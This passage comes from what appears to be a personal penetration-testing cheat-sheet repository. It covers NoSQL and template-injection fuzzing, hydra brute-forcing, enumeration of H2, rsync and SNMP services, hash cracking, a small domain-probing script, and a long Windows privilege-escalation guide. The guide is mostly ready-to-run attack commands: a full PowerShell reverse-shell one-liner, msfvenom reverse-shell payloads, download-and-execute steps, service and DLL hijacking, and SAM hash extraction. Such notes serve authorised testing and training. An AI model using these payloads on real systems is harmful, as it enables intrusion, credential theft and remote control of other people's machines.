@ \[ \\\\ \] \^ _ ` \{ \| \} ~' > nosqli_regex.txt # Regex special characters are escaped 723 | sed 's/\s\+/\n/g' -i nosqli_regex.txt 724 | 725 | wfuzz -c -z file,./nosqli_regex.txt -d '{"username": {"$regex": "^FUZZ.*"}, "password": {"$ne": null}}' -u 726 | wfuzz -c -z file,./nosqli_regex.txt -d '{"username": "", "password": {"$regex": "^FUZZ.*"}}' -u 727 | ``` 728 | 729 | 730 | ## Server side template injection _(SSTI)_ 731 | - Common PoC: 732 | ``` 733 | {{1+1}} 734 | ${1+1} 735 | ``` 736 | - Fuzzing: 737 | ```bash 738 | wget https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Server%20Side%20Template%20Injection/Intruder/ssti.fuzz 739 | wfuzz -c -w ./ssti.fuzz -d "=FUZZ" -u 740 | ``` 741 | - Payloads: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection 742 | 743 | 744 | ## Error-based information disclosure 745 | - Parameters/paths/headers/cookies fuzzing with some unusual data: 746 | ```bash 747 | wfuzz -c -z file,/Users/kali/wfuzz_wordlist/Injections/bad_chars.txt,urlencode --basic : -X -u ?=FUZZ 748 | wfuzz -c -z file,/Users/kali/wfuzz_wordlist/Injections/bad_chars.txt -d 'someparam=FUZZ' -u 749 | wfuzz -c -z file,/Users/kali/wfuzz_wordlist/Injections/bad_chars.txt --basic : -X -H "
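: FUZZ" 750 | wfuzz -c -z file,/Users/kali/wfuzz_wordlist/Injections/bad_chars.txt,urlencode --basic : -X -b "=FUZZ" 751 | ``` 752 | 753 | 754 | ## Brute-forcing credentials 755 | - Brute-force post form username: 756 | ```bash 757 | hydra -V -t 64 -L /Users/kali/SecLists/Usernames/xato-net-10-million-usernames.txt -p test -s http-post-form "/:username=^USER^&password=^PASS^:" # Important: do not put '/' after the 758 | ``` 759 | - Brute-force post form password _(repeated failures for one user can lock the account; check the lockout policy and lower `-t` on real targets)_: 760 | ```bash 761 | hydra -V -t 64 -l -P /Users/kali/rockyou.txt -s http-post-form "/:username=^USER^&password=^PASS^:" 762 | ``` 763 | - Brute-force basic auth: 764 | ```bash 765 | hydra -V -t 64 -l -P /Users/kali/rockyou.txt -s http-get "/" 766 | ``` 767 |
--------------------------------------------------------------------------------
/enum_and_exploit/tcp-80-443-http/domain_verifier.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
"""Probe a list of candidate hostnames over HTTPS and record the ones that answer.

Reads one hostname per line from ``domains.txt`` (blank lines are skipped),
requests ``https://<hostname>`` for each with a short timeout, and appends every
hostname whose final response status is 2xx/3xx to ``verified_domains.txt``.

Only HTTPS is probed; hosts that serve plain HTTP only will not be reported.
TLS certificate verification is left at the ``requests`` default (enabled) on
purpose - do not add ``verify=False`` here.
"""
import threading
from concurrent.futures import ThreadPoolExecutor, as_completed

import requests

INPUT_FILE = "domains.txt"
OUTPUT_FILE = "verified_domains.txt"
REQUEST_TIMEOUT = 5
MAX_WORKERS = 10

# Serialises appends to OUTPUT_FILE; workers run concurrently in the pool.
_output_lock = threading.Lock()


def execute_request(domain_to_query):
    """Request https://<domain_to_query> and record the host if it responds.

    A host counts as "working" when the final status code (after redirects,
    which ``requests`` follows by default) is in the 200-399 range. Network
    and HTTP-level failures (DNS errors, timeouts, TLS errors, invalid URLs)
    are treated as "not working" and skipped; any other exception is left to
    propagate so that real bugs (e.g. an unwritable output file) are not hidden.

    Returns None; the result is reported via stdout and OUTPUT_FILE.
    """
    url = "https://" + domain_to_query
    try:
        response = requests.get(url, timeout=REQUEST_TIMEOUT)
    except requests.RequestException:
        # Best-effort probe: an unreachable or misbehaving host is simply not listed.
        return
    if 200 <= response.status_code < 400:
        print("Found working domain: " + url)
        with _output_lock, open(OUTPUT_FILE, mode="a") as verified_domains_file:
            verified_domains_file.write(domain_to_query + "\n")


def main():
    """Read the candidate list and probe every entry concurrently."""
    print("Reading domain list...")
    # Read-only is enough here; "r+" would fail needlessly on a read-only location.
    with open(INPUT_FILE, mode="r") as domains_file:
        domains = [line.strip() for line in domains_file if line.strip()]
    print("Executing requests...")
    with ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor:
        futures = [executor.submit(execute_request, domain) for domain in domains]
        # .result() re-raises anything a worker did not handle itself.
        for future in as_completed(futures):
            future.result()


if __name__ == "__main__":
    main()
--------------------------------------------------------------------------------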
/enum_and_exploit/tcp-8082-9092-h2/README.md: -------------------------------------------------------------------------------- 1 | # H2 enumeration and exploitation 2 | * [Initial enumeration](#initial-enumeration) 3 | * [Connecting to an H2 database](#connecting-to-an-h2-database) 4 | * [Enumerating a database](#enumerating-a-database) 5 | 6 | ## Initial enumeration 7 | ```bash 8 | nmap -vv -p 8082,9092 -sT --script=+h2* 9 | ``` 10 | 11 | ## Connecting to an H2 database 12 | - Connect to a database using `h2.jar`: 13 | ```bash 14 | java -cp h2*.jar org.h2.tools.Shell 15 | ``` 16 | 17 | ## Enumerating a database 18 | - Get version: 19 | ```SQL 20 | SELECT H2VERSION(); 21 | ``` 22 | - Get current database: 23 | ```SQL 24 | SELECT database(); 25 | ``` 26 | - Get current user: 27 | ```SQL 28 | SELECT current_user(); 29 | ``` 30 | - Get current user's password hash: 31 | ```SQL 32 | SELECT password FROM information_schema.users WHERE user_name=current_user(); -- Some databases still use password column 33 | ``` 34 | - List all users: 35 | ```SQL 36 | SELECT user FROM information_schema.users ORDER BY 1; 37 | ``` 38 | - Get default user's password hash: 39 | ```SQL 40 | SELECT password FROM information_schema.users WHERE user_name='sa'; -- Some databases still use password column 41 | ``` 42 | - List tables: 43 | ```SQL 44 | SELECT table_schema,table_name FROM information_schema.tables ORDER BY 1; 45 | ``` 46 | - List table columns: 47 | ```SQL 48 | SELECT column_name FROM information_schema.columns WHERE table_name='' ORDER BY 1; 49 | ``` 50 | - Search for `%user%` like tables: 51 | ```SQL 52 | SELECT table_schema,table_name FROM information_schema.tables WHERE lower(table_name) LIKE concat(char(37),char(117),char(115),char(101),char(114),char(37)) ORDER BY 1 LIMIT 1 OFFSET 0; 53 | ``` -------------------------------------------------------------------------------- /enum_and_exploit/tcp-873-rsync/README.md: 
-------------------------------------------------------------------------------- 1 | # Rsync enumeration and exploitation 2 | * [Initial enumeration](#initial-enumeration) 3 | * [Connecting to and enumerating a share](#connecting-to-and-enumerating-a-share) 4 | * [Uploading files or folders](#uploading-files-or-folders) 5 | * [Post enumerating configuration files](#post-enumerating-configuration-files) 6 | 7 | ## Initial enumeration 8 | ```bash 9 | nmap -vv -p 873 -sT --script=+rsync* 10 | ``` 11 | 12 | ## Connecting to and enumerating a share 13 | - List share files: 14 | ```bash 15 | rsync -av --list-only rsync:/// # Anonymous 16 | rsync -av --list-only rsync://@/ 17 | ``` 18 | - Download all files: 19 | ```bash 20 | rsync -av rsync:/// ./ 21 | rsync -av rsync://@/ ./ 22 | ``` 23 | 24 | ## Uploading files or folders 25 | ```bash 26 | rsync -av rsync://// 27 | rsync -av rsync://@// 28 | ``` 29 | 30 | ## Post enumerating configuration files 31 | ```bash 32 | find / \( -name rsyncd.conf -o -name rsyncd.secrets \) 2>/dev/null 33 | ``` 34 | -------------------------------------------------------------------------------- /enum_and_exploit/udp-161-snmp/README.md: -------------------------------------------------------------------------------- 1 | # Simple Network Management Protocol _(SNMP)_ enumeration and exploitation 2 | * [Initial enumeration](#initial-enumeration) 3 | * [Community string brute-forcing](#community-string-brute-forcing) 4 | * [Collecting OIDs and values](#collecting-oids-and-values) 5 | 6 | ## Initial enumeration 7 | ```bash 8 | sudo nmap -vv -p 161 -sU --script=+snmp* 9 | ``` 10 | 11 | ## Community string brute-forcing 12 | ```bash 13 | hydra -P /Users/kali/SecLists/Discovery/SNMP/common-snmp-community-strings.txt snmp 14 | ``` 15 | 16 | ## Collecting OIDs and values 17 | ```bash 18 | snmpwalk -v -c 19 | ``` 20 | -------------------------------------------------------------------------------- /enum_and_exploit/utils/README.md: 
-------------------------------------------------------------------------------- 1 | # Utilities 2 | * [Listening to reverse shell](#listening-to-reverse-shell) 3 | * [Cracking hashes](#cracking-hashes) 4 | * [Cracking encrypted files](#cracking-encrypted-files) 5 | * [Reading Microsoft Compound Files and Office documents](#reading-microsoft-compound-files-and-office-documents) 6 | * [Catching creds in incoming auth requests](#catching-creds-in-incoming-auth-requests) 7 | * [Certificates and keys](#certificates-and-keys) 8 | * [Base64 Encoding/Decoding](#base64-encodingdecoding) 9 | * [Beautify JSON](#beautify-json) 10 | * [Deblur images](#deblur-images) 11 | 12 | ## Listening to reverse shell 13 | ```bash 14 | ncat -l 443 -v 15 | ``` 16 | 17 | ## Cracking hashes 18 | - Identify hash type _(here are some hash examples: https://hashcat.net/wiki/doku.php?id=example_hashes)_: 19 | ```bash 20 | name-that-hash --text 21 | ``` 22 | - Crack a hash (John The Ripper): 23 | ```bash 24 | john ./hash --wordlist=/Users/kali/rockyou.txt 25 | john ./hash --format= --wordlist=/Users/kali/rockyou.txt 26 | john --show ./hash 27 | ``` 28 | - Crack a hash (Hashcat. Unreliable on Apple Silicon) 29 | ```bash 30 | hashcat -m -a 0 ./hash /Users/kali/rockyou.txt 31 | ``` 32 | 33 | ## Cracking encrypted files 34 | - Find `2john` converter for required file type: 35 | ```bash 36 | locate *2john* 37 | ``` 38 | - Generate a hash: 39 | ```bash 40 | <2john_converter> > hash 41 | ``` 42 | - Crack it: 43 | ```bash 44 | john ./hash --wordlist=/Users/kali/rockyou.txt 45 | ``` 46 | 47 | ## Reading Microsoft Compound Files and Office documents 48 | - Read using Apache OpenOffice. 49 | - Analyze files using oletools: https://github.com/decalage2/oletools 50 | 51 | ## Catching creds in incoming auth requests 52 | - Responder supports many different protocols. 
Default usage example: 53 | ```bash 54 | sudo responder -I tun0 55 | ``` 56 | 57 | ## Certificates and keys 58 | - Convert `.ppk` keys to `.pem` _(a text-based container using base-64 encoding)_ or `.key`: 59 | ```bash 60 | puttygen my.ppk -O private-openssh -o my.pem 61 | ``` 62 | - Generate a public key: 63 | ```bash 64 | puttygen my.ppk -O public-openssh -o my.pub 65 | puttygen my.ppk -O public -o my.pub 66 | ``` 67 | 68 | ## Base64 Encoding/Decoding 69 | - Encode: 70 | ```bash 71 | echo -n "STRING" | base64 72 | ``` 73 | - Decode: 74 | ```bash 75 | echo -n "STRING" | base64 --decode 76 | ``` 77 | 78 | ## Beautify JSON 79 | ```bash 80 | cat some_json_file.json | jq 81 | ``` 82 | 83 | ## Deblur images 84 | - Extract from pdf is necessary: https://tools.pdf24.org/en/extract-images 85 | - Try to deblur an image using [Depix](https://github.com/spipm/Depix): 86 | ```bash 87 | python3 /Users/kali/depix/depix.py \ 88 | -p .png \ 89 | -s /Users/kali/depix/images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png # Or try to play with other options in images folder 90 | ``` -------------------------------------------------------------------------------- /enum_and_exploit/windows/README.md: -------------------------------------------------------------------------------- 1 | # Windows privilege escalation 2 | * [Utilities](#utilities) 3 | * [Shell stabilization and interactivity](#shell-stabilization-and-interactivity) 4 | * [Useful reverse shells](#useful-reverse-shells) 5 | * [RDP connection](#rdp-connection) 6 | * [Port forwarding _(Plink)_](#port-forwarding-plink) 7 | * [Copy files from/to the target](#copy-files-fromto-the-target) 8 | * [Autoenumeration _(WinPEAS)_](#autoenumeration-winpeas) 9 | * [Autoenumeration _(SharpUp)_](#autoenumeration-sharpup) 10 | * [Autoenumeration _(Seatbelt)_](#autoenumeration-seatbelt) 11 | * [Effective permissions listing _(AccessChk)_](#effective-permissions-listing-accesschk) 12 | * [Processes monitoring 
_(ProcMon)_](#processes-monitoring-procmon) 13 | * [Windows exploit suggester](#windows-exploit-suggester) 14 | * [Manual enumeration](#manual-enumeration) 15 | * [System](#system) 16 | * [Users and groups](#users-and-groups) 17 | * [Apps, tasks, and services](#apps-tasks-and-services) 18 | * [Network](#network) 19 | * [Registries](#registries) 20 | * [Files and folders](#files-and-folders) 21 | * [Kernel exploits](#kernel-exploits) 22 | * [Permissions modification](#permissions-modification) 23 | * [Switching users in console](#switching-users-in-console) 24 | * [Catching Net-NTLMv2 hashes](#catching-net-ntlmv2-hashes) 25 | * [NBNS spoofing and NTLM relay _(HotPotato)_](#nbns-spoofing-and-ntlm-relay-hotpotato) 26 | * [Exploiting `AlwaysInstallElevated`](#exploiting-alwaysinstallelevated) 27 | * [Unquoted service path or service executable modification](#unquoted-service-path-or-service-executable-modification) 28 | * [Service binpath modification](#service-binpath-modification) 29 | * [Service registry modification](#service-registry-modification) 30 | * [DLL hijacking](#dll-hijacking) 31 | * [Parsing `SAM` and `SYSTEM` backups](#parsing-sam-and-system-backups) 32 | * [Using given privileges](#using-given-privileges) 33 | * [Token impersonation _(RoguePotato)_](#token-impersonation-roguepotato) 34 | * [Token impersonation _(PrintSpoofer)_](#token-impersonation-printspoofer) 35 | * [Token impersonation _(JuicyPotato)_](#token-impersonation-juicypotato) 36 | * [Token impersonation _(Incognito)_](#token-impersonation-incognito) 37 | * [Retrieving browser files _(SharpWeb)_](#retrieving-browser-files-sharpweb) 38 | * [Meterpreter's getsystem exploit](#meterpreters-getsystem-exploit) 39 | 40 | ## Utilities 41 | ### Shell stabilization and interactivity 42 | - Listen to reverse shell: 43 | ```bash 44 | ncat -l 443 -v 45 | ``` 46 | 47 | ### Useful reverse shells 48 | - Powershell oneliner: 49 | ```cmd 50 | powershell -c "$client = New-Object 
System.Net.Sockets.TCPClient('',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" 51 | ``` 52 | - Base64 encoded powershell oneliner: 53 | ```bash 54 | 55 | wget https://gist.githubusercontent.com/tothi/ab288fb523a4b32b51a53e542d40fe58/raw/40ade3fb5e3665b82310c08d36597123c2e75ab4/mkpsrevshell.py 56 | python3 mkpsrevshell.py 443 57 | ``` 58 | - TCP reverse shell executable: 59 | ```bash 60 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f exe > shell.exe 61 | ``` 62 | - Via SMB: 63 | ```bash 64 | psexec.py ':@' 65 | wmiexec.py ':@' 66 | winexe -U '%' // cmd.exe 67 | pth-winexe -U '%:' // cmd.exe 68 | ``` 69 | - Via WinRM: 70 | ```bash 71 | evil-winrm -i -u -p 72 | evil-winrm -i -u -H 73 | ``` 74 | 75 | ### RDP connection 76 | ```bash 77 | xfreerdp +clipboard /w:1280 /h:720 /smart-sizing /cert:ignore /v: /u: /p:'' 78 | ``` 79 | 80 | ### Port forwarding _(Plink)_ 81 | - Prepare: 82 | ```bash 83 | cp ~/pentesting-tools/plink/plink64.exe ./plink.exe 84 | ``` 85 | - [Copy to the target](#copy-files-fromto-the-target) 86 | - Forward the blocked port: 87 | ```cmd 88 | .\plink.exe root@ -R :127.0.0.1: 89 | ``` 90 | 91 | ### Copy files from/to the target 92 | - SMB: 93 | ```bash 94 | sudo smbserver.py -smb2support share . 95 | ``` 96 | ```cmd 97 | copy \\\share 98 | copy \\\share\ . 99 | ``` 100 | - SMB _(simply execute the file)_: 101 | ```bash 102 | sudo smbserver.py -smb2support share . 103 | ``` 104 | ```cmd 105 | \\\share\ 106 | ``` 107 | - SCP: 108 | ```bash 109 | scp @: . 
110 | scp @: 111 | ``` 112 | - FTP: 113 | ```bash 114 | python3 -m pyftpdlib -w -p 2121 115 | ``` 116 | ```cmd 117 | ftp # anonymous user and empty password 118 | open 2121 119 | put 120 | ``` 121 | - HTTP: 122 | ```bash 123 | sudo python3 -m http.server 80 124 | ``` 125 | ```cmd 126 | certutil -urlcache -split -f "http:///" 127 | powershell -c "(New-Object System.Net.WebClient).DownloadFile(\"http:///\", \"\")" 128 | ``` 129 | 130 | ## Autoenumeration _(WinPEAS)_ 131 | - Prepare: 132 | ```bash 133 | wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany.exe -O ./winpeas.exe 134 | 135 | cp ~/pentesting-tools/winpeas/winPEASany.exe ./winpeas.exe # Or my stored version 136 | ``` 137 | - [Copy to the target](#copy-files-fromto-the-target) 138 | - Run: 139 | ```cmd 140 | .\winpeas.exe 141 | ``` 142 | 143 | ## Autoenumeration _(SharpUp)_ 144 | - Prepare: 145 | ```bash 146 | cp ~/pentesting-tools/sharpup/SharpUp.exe ./sharpup.exe 147 | ``` 148 | - [Copy to the target](#copy-files-fromto-the-target) 149 | - Run: 150 | ```cmd 151 | .\sharpup.exe 152 | ``` 153 | 154 | ## Autoenumeration _(Seatbelt)_ 155 | - Prepare: 156 | ```bash 157 | cp ~/pentesting-tools/seatbelt/Seatbelt.exe ./seatbelt.exe 158 | ``` 159 | - [Copy to the target](#copy-files-fromto-the-target) 160 | - Run: 161 | ```cmd 162 | .\seatbelt.exe -group=all 163 | ``` 164 | 165 | ## Effective permissions listing _(AccessChk)_ 166 | - Prepare: 167 | ```bash 168 | cp ~/pentesting-tools/accesschk/accesschk.exe ./accesschk.exe 169 | ``` 170 | - [Copy to the target](#copy-files-fromto-the-target) 171 | - List service permissions: 172 | ```cmd 173 | .\accesschk.exe /accepteula -ucqv 174 | ``` 175 | - List registry permissions: 176 | ```cmd 177 | .\accesschk.exe /accepteula -uvwdk "" 178 | ``` 179 | - List file permissions: 180 | ```cmd 181 | .\accesschk.exe /accepteula -quvw "C:\" 182 | ``` 183 | - List directory permissions: 184 | ```cmd 185 | .\accesschk.exe /accepteula -uwdq "C:\" 186 | ``` 
187 | 188 | ## Processes monitoring _(ProcMon)_ 189 | - Prepare: 190 | ```bash 191 | cp ~/pentesting-tools/procmon/Procmon64.exe ./procmon.exe 192 | ``` 193 | - [Copy to the target](#copy-files-fromto-the-target) 194 | - Run _(running as administrator required)_: 195 | ``` 196 | .\procmon.exe 197 | ``` 198 | - Search for a DLL not found by a system process: 199 | ``` 200 | Result is NAME NOT FOUND 201 | User is NT AUTHORITY\SYSTEM 202 | Path ends with dll 203 | ``` 204 | 205 | ## Windows exploit suggester 206 | - System info _(save output into the `systeminfo.txt` file on Kali)_: 207 | ```cmd 208 | systeminfo 209 | wmic qfe 210 | ``` 211 | - Run Exploit Suggester: 212 | ```bash 213 | wes --update 214 | wes systeminfo.txt --definitions ./definitions.zip -i "Elevation of Privilege" --exploits-only 215 | ``` 216 | 217 | ## Manual enumeration 218 | ### System 219 | - System info: 220 | ```cmd 221 | systeminfo 222 | wmic os 223 | wmic os get osarchitecture 224 | wmic qfe 225 | powershell -c "Get-ComputerInfo" 226 | powershell -c "[System.Environment]::OSVersion" 227 | powershell -c "Get-Hotfix -description \"Security update\"" 228 | powershell -c "Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid}" 229 | ``` 230 | - Environment variables: 231 | ```cmd 232 | set 233 | powershell -c "Get-ChildItem Env: | ft Key,Value" 234 | ``` 235 | 236 | ### Users and groups 237 | - Current user: 238 | ```cmd 239 | whoami 240 | echo %USERNAME% 241 | powershell -c "$env:username" 242 | net user %USERNAME% 243 | whoami /priv 244 | whoami /groups 245 | ``` 246 | - Other users: 247 | ```cmd 248 | net user 249 | powershell -c "Get-LocalUser | ft Name,Enabled,LastLogon" 250 | ``` 251 | - Groups: 252 | ```cmd 253 | net localgroup 254 | powershell -c "Get-LocalGroup | ft Name" 255 | net localgroup Administrators 256 | powershell -c "Get-LocalGroupMember Administrators | ft Name, PrincipalSource" 257 | ``` 258 | - Stored credentials: 259 | ```cmd 260 | cmdkey 
/list 261 | ``` 262 | 263 | ### Apps, tasks, and services 264 | - List services: 265 | ```cmd 266 | net start 267 | wmic service list brief 268 | sc query 269 | powershell -c "Get-Service" 270 | tasklist /SVC 271 | ``` 272 | - Get service info: 273 | ```cmd 274 | sc qc 275 | sc query 276 | ``` 277 | - List tasks: 278 | ```cmd 279 | tasklist /v 280 | tasklist /v /fi "username eq system" 281 | tasklist /v | findstr /si "system admin" 282 | powershell -c "Get-Process" 283 | ``` 284 | - List schedules tasks: 285 | ```cmd 286 | schtasks /query /fo LIST 2>nul | findstr TaskName 287 | powershell -c "Get-ScheduledTask" 288 | powershell -c "Get-ScheduledTask | where {$_.TaskPath -notlike \"\Microsoft*\"}" 289 | ``` 290 | - List startup tasks: 291 | ```cmd 292 | wmic startup get caption,command 293 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R 294 | reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run 295 | reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 296 | dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" 297 | dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" 298 | ``` 299 | - List installed programs: 300 | ```cmd 301 | reg query "HKLM\SOFTWARE" 302 | reg query "HKCU\SOFTWARE" 303 | dir /a "C:\Program Files" 304 | dir /a "C:\Program Files (x86)" 305 | ``` 306 | 307 | ### Network 308 | - General info: 309 | ```cmd 310 | hostname 311 | ipconfig 312 | ipconfig /all 313 | ``` 314 | - List ports: 315 | ```cmd 316 | netstat -ano 317 | ``` 318 | - List shares: 319 | ```cmd 320 | net share 321 | powershell -c "Find-DomainShare -ComputerDomain domain.local" 322 | ``` 323 | 324 | ### Registries 325 | - List registries: 326 | ```cmd 327 | reg query "HKLM" 328 | reg query "HKCU" 329 | ``` 330 | - `AlwaysInstallElevated` _(both should be set to 1 for the exploit to work)_: 331 | ```cmd 332 | reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer" 333 | reg query 
"HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer" 334 | ``` 335 | - Common registries with stored passwords: 336 | ```cmd 337 | reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon" 338 | reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s 339 | reg query "HKCU\Software\ORL\WinVNC3\Password" 340 | reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" 341 | ``` 342 | - Search for passwords in registries _(too much output, better check registries known for storing passwords)_: 343 | ```cmd 344 | reg query HKLM /f pass /t REG_SZ /s 345 | reg query HKCU /f pass /t REG_SZ /s 346 | reg query HKLM /f passwd /t REG_SZ /s 347 | reg query HKCU /f passwd /t REG_SZ /s 348 | reg query HKLM /f password /t REG_SZ /s 349 | reg query HKCU /f password /t REG_SZ /s 350 | ``` 351 | 352 | ### Files and folders 353 | - List drives: 354 | ```cmd 355 | wmic logicaldisk get caption,description,providername 356 | powershell -c "Get-PSDrive | where {$_.Provider -like \"Microsoft.PowerShell.Core\FileSystem\"}| ft Name,Root" 357 | powershell -c "Get-PSDrive -PsProvider FileSystem" 358 | ``` 359 | - File or directory permissions: 360 | ```cmd 361 | icacls "C:\" 362 | ``` 363 | - List files in common folders: 364 | ```cmd 365 | dir /a C:\ 366 | dir /a "C:\Temp" 367 | dir /a "C:\Users" 368 | dir /a "C:\Users\%username%" 369 | dir /a "C:\Users\%username%\Desktop" 370 | dir /a "C:\Users\%username%\Downloads" 371 | dir /a "C:\Users\%username%\Documents" 372 | dir /a "C:\Users\%username%\AppData\" 373 | dir /a "C:\Users\%username%\AppData\Local" 374 | dir /a "C:\Users\%username%\AppData\LocalLow" 375 | dir /a "C:\Users\%username%\AppData\Roaming" 376 | dir /a "C:\Users\%username%\AppData\Local\Temp" 377 | ``` 378 | - Common files and registries having stored passwords: 379 | ```cmd 380 | icacls %SYSTEMROOT%\repair\SAM 381 | icacls %SYSTEMROOT%\System32\config\RegBack\SAM 382 | icacls %SYSTEMROOT%\System32\config\SAM 383 | icacls %SYSTEMROOT%\repair\system 384 | icacls 
%SYSTEMROOT%\System32\config\SYSTEM 385 | icacls %SYSTEMROOT%\System32\config\RegBack\system 386 | ``` 387 | - Search for files that often store passwords: 388 | ```cmd 389 | dir /s/b "C:\*sysprep.inf" "C:\*sysprep.xml" "C:\*unattend.xml" "C:\*web.config" 2>nul 390 | ``` 391 | - Search for passwords in common config files: 392 | ```cmd 393 | powershell -c "Get-ChildItem -Path C:\ -Filter unattend.xml -Recurse -Depth 3 -ErrorAction SilentlyContinue | Select-String -Pattern \"password\" -Context 3,3" 394 | powershell -c "Get-ChildItem -Path C:\ -Filter sysprep -Recurse -Depth 3 -ErrorAction SilentlyContinue | Select-String -Pattern \"password\" -Context 3,3" 395 | powershell -c "Get-ChildItem -Path C:\ -Filter web.config -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern \"password\" -Context 3,3" 396 | ``` 397 | - Search for passwords in files in the current directory: 398 | ```cmd 399 | findstr /spin password *.config *.xml *.ini *.txt 400 | ``` 401 | 402 | ## Kernel exploits 403 | - List of precompiled Kernel Exploits: https://github.com/SecWiki/windows-kernel-exploits 404 | 405 | ## Permissions modification 406 | - If the file or folder is owned by me, I can get all permissions for it: 407 | ```cmd 408 | icacls "C:\" /grant :(F) 409 | ``` 410 | 411 | ## Switching users in console 412 | - Prepare the reverse shell: 413 | ```bash 414 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f exe > shell.exe 415 | ``` 416 | - [Copy to the target](#copy-files-fromto-the-target) 417 | - Run: 418 | ```cmd 419 | runas /user: .\shell.exe 420 | ``` 421 | - Run with stored credentials _(or if password for user is not required)_: 422 | ```cmd 423 | runas /savecred /user: .\shell.exe 424 | ``` 425 | 426 | ## Catching Net-NTLMv2 hashes 427 | - Prepare the responder: 428 | ```bash 429 | sudo responder -I tun0 430 | ``` 431 | - Connect to the share from target: 432 | ```cmd 433 | ///share/anything 434 | ``` 435 | - Crack the hash: 436 | ```bash 437 | echo '' > 
hash 438 | hashcat -m 5600 -a 0 ./hash /Users/kali/rockyou.txt 439 | ``` 440 | 441 | ## NBNS spoofing and NTLM relay _(HotPotato)_ 442 | - Prepare the exploit and the reverse shell: 443 | ```bash 444 | cp ~/pentesting-tools/hotpotato/Potato.exe ./potato.exe 445 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f exe > shell.exe 446 | ``` 447 | - [Copy to the target](#copy-files-fromto-the-target) 448 | - Run it on Windows 7: 449 | ```cmd 450 | .\potato.exe -ip -disable_exhaust true -disable_defender true -cmd "\shell.exe" 451 | ``` 452 | - Run it on Windows Server 2008: 453 | ```cmd 454 | .\potato.exe -ip -disable_exhaust true -disable_defender true --spoof_host WPAD.EMC.LOCAL -cmd "\shell.exe" 455 | ``` 456 | 457 | ## Exploiting `AlwaysInstallElevated` 458 | - Prepare the reverse shell: 459 | ```bash 460 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f msi > shell.msi 461 | ``` 462 | - [Copy to the target](#copy-files-fromto-the-target) 463 | - Run: 464 | ```cmd 465 | msiexec /quite /qn /i shell.msi 466 | ``` 467 | 468 | ## Unquoted service path or service executable modification 469 | - Prepare the reverse shell: 470 | ```bash 471 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f exe > shell.exe 472 | ``` 473 | - [Copy to the target](#copy-files-fromto-the-target) 474 | - Stop/Start service: 475 | ```cmd 476 | sc stop 477 | sc start 478 | 479 | net stop 480 | net start 481 | ``` 482 | 483 | ## Service binpath modification 484 | - Prepare the reverse shell: 485 | ```bash 486 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f exe > shell.exe 487 | ``` 488 | - [Copy to the target](#copy-files-fromto-the-target) 489 | - Modify service binpath: 490 | ```cmd 491 | sc config binpath= "\"C:\Users\\AppData\Local\Temp\shell.exe\"" 492 | ``` 493 | - Stop/Start service 494 | ```cmd 495 | sc stop 496 | sc start 497 | 498 | net stop 499 | net start 500 | ``` 501 | 502 | ## Service registry modification 503 | - Prepare the reverse shell: 
504 | ```bash 505 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f exe > shell.exe 506 | ``` 507 | - [Copy to the target](#copy-files-fromto-the-target) 508 | - Modify the registry: 509 | ```cmd 510 | reg add "" /v ImagePath /t REG_EXPAND_SZ /d "C:\Users\\AppData\Local\Temp\shell.exe" /f 511 | ``` 512 | - Stop/Start service 513 | ```cmd 514 | sc stop 515 | sc start 516 | 517 | net stop 518 | net start 519 | ``` 520 | 521 | ## DLL hijacking 522 | - Prepare the reverse shell: 523 | ```bash 524 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f dll -o shell.dll 525 | ``` 526 | - [Copy to the target](#copy-files-fromto-the-target) and put instead of the missing DLL. 527 | 528 | ## Parsing `SAM` and `SYSTEM` backups 529 | - Run SMB server on Kali: 530 | ```bash 531 | sudo smbserver.py share . 532 | ``` 533 | - Copy files from Windows target. 534 | - Download `creddump7` in Kali: 535 | ```bash 536 | cp -r ~/pentesting-tools/creddump7 ./creddump7 537 | ``` 538 | - Extract cached credentials: 539 | ```bash 540 | # The output should look something like: 541 | # admin:1004:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da::: 542 | # where a9fdfa038c4b75ebc76dc855dd74f0da is the password hash 543 | python2 ./creddump7/pwdump.py ./SYSTEM ./SAM 544 | ``` 545 | - Crack the hash _(or you can run `pth-winexe` or `evil-winrm` shell using hash only)_: 546 | ```bash 547 | hashcat -m 1000 --force /Users/kali/rockyou.txt 548 | ``` 549 | 550 | ## Using given privileges 551 | - `SeBackupPrivilege` grants read access to all files regardless of their ACL. 552 | - `SeRestorePrivilege` grants write access to all files regardless of their ACL. 553 | - `SeTakeOwnershipPrivilege` allows to take the ownership of files. 
